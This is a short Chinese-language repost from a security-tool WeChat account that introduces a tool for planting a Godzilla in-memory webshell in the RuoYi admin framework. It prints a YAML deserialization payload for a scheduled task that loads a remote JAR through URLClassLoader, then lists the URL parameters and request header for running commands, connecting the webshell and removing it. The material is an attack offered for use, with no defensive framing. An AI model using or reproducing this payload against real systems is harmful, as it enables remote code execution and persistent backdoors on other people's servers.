===================================
0x01 工具介绍
ruoyi 后台定时任务注入哥斯拉内存马。
0x02 安装与使用
ruoyi 后台创建定时任务
payload
[
!!java.net.URLClassLoader [[
!!java.net.URL ["http://127.0.0.1:12346/yaml-payload-for-ruoyi-1.0-SNAPSHOT.jar"]
]]
]')
执行定时任务
web 服务器接受到请求
执行命令 /login?cmd=whoami
哥斯拉连接,需要配置请求头 X-Cmd-Ruoyi: 任意字符串
连接地址 /login?cmd=1,有 cmd 参数即可
删除内存马 /login?cmd=delete
原文始发于微信公众号(Web安全工具库):ruoyi 后台定时任务注入哥斯拉内存马(3月1日更新)
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论